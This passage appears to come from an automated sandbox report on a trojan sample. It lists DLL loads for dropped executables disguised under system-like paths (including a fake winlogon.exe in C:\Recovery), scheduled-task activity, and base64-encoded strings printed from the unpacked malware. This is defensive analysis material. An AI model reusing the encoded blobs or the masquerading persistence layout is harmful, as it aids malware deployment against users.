                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: apphelp.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
                                 Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: apphelp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: version.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: version.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
                                 Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                                 Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                                 Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
                                 Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: apphelp.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
                                 Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: version.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: ktmw32.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: propsys.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: edputil.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: urlmon.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: iertutil.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: srvcli.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: netutils.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: windows.staterepositoryps.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: wintypes.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: appresolver.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: bcp47langs.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: slc.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: userenv.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: sppc.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: onecorecommonproxystub.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: onecoreuapcommonproxystub.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: mpr.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: pcacli.dll
                                 Source: C:\Recovery\winlogon.exe Section loaded: sfc_os.dll
                                 Source: H9gMIu2HXi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformBlock'
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock'
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformBlock'
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock'
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, qJk.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sz3.cs Base64 encoded string: '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'
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class17.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.cs Base64 encoded string: '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', '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
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, qJk.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sz3.cs Base64 encoded string: 'IRHKkK7+9S0IugXON3gvLsxJjZL9YaEKz/ItfY2KMibv3HGRDY4HX1+0x6vyRlP1N4gE0v20VeDKoKK009sEy3ouyqPq1nDV7UInHLKa0+i1EzCuhkbBF+hHquku7Lo/yvKfWKTtDSC0cid2m2aAXySLeN9z77QHOw6ohp+EDczjdlkMq8m7a2ClwiEast7dEwz6w4bD8wTSzoz4j5qzrO8RqjmHTyrApuBSl+1gu2s5LoFXoH5oPozdF2hTyr4UJafbA2pNEGdP/VLXgbIg4QM5bvggf+gkojeqw45IqHRg8ZcCDn/xnBJvzaQskNO/n2SyskcGTGC2IHglQTunUGHh4+wEaQYtR4uojeQt1AxtzrO/QY7Xs4yhQpA5ELH1fxkHlN9mBEm06zoECj/vz7jJG2mQlWiHY9U9LUYCXv/lx66c36E3vw4zQ5xVrzhaydHvLiCXt0pZUDFEWfZaVaZ5AKGW0zqkBSvHh4qMXIukrkK1kUF6G2eX26nBF9etwOUvoJ9uQsq2Dy+GQBdk03ZdTGhPoKKJfEvzulE4FSXAoUFrTLyla3gXMOhV434cPyDRSbyiZCGATsBDfEtT+1yp5qKdbJS1GVEo5JVGDZl853Kba/dh4CBx/W6Bj/DOJfimC7NBUJ/HnfsGb830T09NrdXxjZIarRpeDSqLXVWibkiIPnFO4OU2WXtEARxfTEp9gbRaEngqlbHte7O4oMf4xO52NXpTo1ex3oIjKRiCMDA77sbJvezZ+hixbnlgDJbVmAulozOcoeLeIT3ajMgqvfmAPVAXbuYvJdtKwevtf2DUl7lEqIkiitboMQ9wa/o5JrJJMwrsX1U4U56gMIX+zCYsR3sgBH+1dLI394nm8h9oLc/7DXLFKCEkJSnOT6P/PRLwNHmWcoHO0WJ5Y6IdGtC8rsInOmg1aD9JbLPqksSmWRX6XfZYmKthY9wC1SDjDFSXykgutRHU6ciKTBRxlvwAPW8V/yOJ1rOCNpk='
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class17.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.cs Base64 encoded string: 'H4sIAAAAAAAEAAHsARP+04uaiZb284OSg9ODhoCBg4CU2I+FhZOLoaT77vyj/qTlq/39/6mq97LktLW39+ys+obq+eb/mKqMjcDPxrrXxdLLrIqAnovN3NOtwdbP1LGZlYme3tHcoDMjOCFCZGp0bSt3Jy5Za2N1dmByeVt5Y3F/f2k+J2U9Q0lDV01BBB0KHx0cHBQYGQgFBREYF1RYTE1VUFlTHAVidnN6cHx+cnl7eHENDAkfGgE0FGEULxosATNiHisrBjk3BRopPTY4LgxdLjpYAU1cUwEWAAEfGR8KWEFereavGlEjUxZVGFcoWRarXCxeFUABQjREBUYMuEkCSwhNBk8+cQCDhfnI7uyTitD5/uv9+fXP79r22drV3NTPhp3F/I+Mj4aKkbubppy5rr6jr6K16/KogYaThZaYl56hgbCPo8GsgomA3MeTuamlraCrkqyfu6PO1Y2+qISmlbu4scUgekVGS3gkKyp6b2VoYGt8Y3B1dnt7dXI6IzhPbmh7PQwDUUZKQUpIT0BETUNeWkpRXVdBFg8UcVlVSV4eERxMNCQjLyE3NSI8PSMlK290bRw+NXM3Ojo7PTouPjgBMBYkW0IYMTYjNSEtFzcCLgECHRQcB05VDTQ3NDc+MikDI+7N7eSk9u/97bOq8N/E1Mrts+/uB8ku4+wBAAA=', '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
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                 Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                 Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@60/41@2/2
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A27727 GetLastError,FormatMessageW, 0_2_00A27727
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00A3B6D2
